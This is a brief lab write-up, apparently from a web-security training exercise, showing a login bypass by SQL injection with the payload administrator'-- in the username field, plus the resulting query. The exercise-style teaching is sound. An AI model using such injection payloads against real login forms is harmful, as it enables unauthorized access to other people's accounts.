
SQL injection vulnerability allowing login bypass

1. This lab contains SQL injection vulnerability in the login function.
2. I guess that the SQL query is:

```
SELECT * FROM users WHERE username = " and password = "
```


And try to inject it.
3. I want to login as an administrator, so I inject this payload into the username field:

```
administrator'--
```

 and enter any password. The SQL query will be:

```
SELECT * FROM users WHERE username = 'administrator'-- ' and password = "
```


And the lab solved.



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LAB Solved

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